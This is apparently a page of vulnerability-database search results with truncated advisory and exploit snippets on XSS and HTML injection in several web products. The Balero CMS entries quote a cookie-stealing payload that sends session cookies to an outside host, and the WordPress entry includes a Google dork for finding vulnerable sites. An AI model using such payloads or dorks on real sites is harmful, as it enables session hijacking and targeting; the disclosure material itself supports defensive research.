JS Html Sanitizer allows XSS when used with contentEditable

Impact XSS vulnerability when the sanitizer is used with a contentEditable element to set the elements innerHTML to a sanitized string produced by the package. If the code is particularly crafted to abuse the code beautifier, that runs AFTER sanitation. Patches Patched in version 2.0.3...

CVE-2023-22971

Cross Site Scripting XSS vulnerability in Hughes Network Systems Router Terminal for HX200 v8.3.1.14, HX90 v6.11.0.5, HX50L v6.10.0.18, HN9460 v8.2.0.48, and HN7000S v6.9.0.37, allows unauthenticated attackers to misuse frames, include JS/HTML code and steal sensitive information from legitimate...

CVE-2023-22971

Cross Site Scripting XSS vulnerability in Hughes Network Systems Router Terminal for HX200 v8.3.1.14, HX90 v6.11.0.5, HX50L v6.10.0.18, HN9460 v8.2.0.48, and HN7000S v6.9.0.37, allows unauthenticated attackers to misuse frames, include JS/HTML code and steal sensitive information from legitimate...

WordPress Huge-IT Slider 2.7.5 - Multiple Vulnerabilities

Exploit for php platform in category web applications Exploit Title: WordPress: wordpress huge-it-slider 2.7.5 & Persistent JS-HTML Code injection, Arbitrary slider deletion Date: 2015-06-23 Google Dork: intitle:"index of" intext:"/wp-content/plugins/slider-image/" Exploit Author: Joaquin Ramirez...

WordPress Huge IT Slider Plugin 2.7.5 - Multiple Vulnerabilities

There are multiple vulnerabilities in this plugin, such as cross-site request forgery and Persistent JS/HTML Injection. These vulnerabilities allow an attacker to make a user with access privileges to a page and inject JavaScript into the database. Solution Upgrade the plugin...

Balero CMS 0.7.2 - Multiple JSHTML Injection Vulnerabilities

Balero CMS 0.7.2 - Multiple JSHTML Injection Vulnerabilities document.cookie="counter=1confirm'XSS'; path=/balerocms/"; csrf+stored xss+filter bypass+session hijack: document.location="http://www.zeroscience.mk/pent...

Balero CMS 0.7.2 Cross Site Scripting

document.cookie="counter=1confirm'XSS'; path=/balerocms/"; csrf+stored xss+filter bypass+session hijack: document.location="http://www.zeroscience.mk/pentest/cthief.php?cookie="+docu\ment.cookie;"...

Whois Cart Billing - Multiple Web Vulnerabilities

Document Title: =============== Whois Cart Billing - Multiple Web Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=343 Release Date: ============= 2011-12-22 Vulnerability Laboratory ID VL-ID: ==================================== 343 Produ...